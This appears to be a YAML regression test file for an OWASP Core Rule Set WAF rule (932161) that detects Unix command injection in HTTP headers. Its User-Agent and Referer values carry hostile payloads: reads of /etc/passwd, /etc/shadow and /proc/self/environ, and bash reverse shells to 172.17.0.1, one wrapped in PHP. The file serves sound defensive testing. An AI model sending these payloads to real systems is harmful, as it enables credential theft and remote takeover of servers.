---
meta:
  author: "Franziska Bühler, azurit"
rule_id: 932161
tests:
  - test_id: 1
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: cat /etc/passwd
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 2
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: /etc/shadow
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 3
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: cat /proc/self/environ
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 4
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 5
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 6
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: <?php `/bin/bash -c \'sh -i>&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 7
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Referer: cat /etc/passwd
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 8
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Referer: /etc/shadow
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 9
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Referer: cat /proc/self/environ
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 10
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 11
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
  - test_id: 12
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Referer: <?php `/bin/bash -c \'sh -i>&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932161]
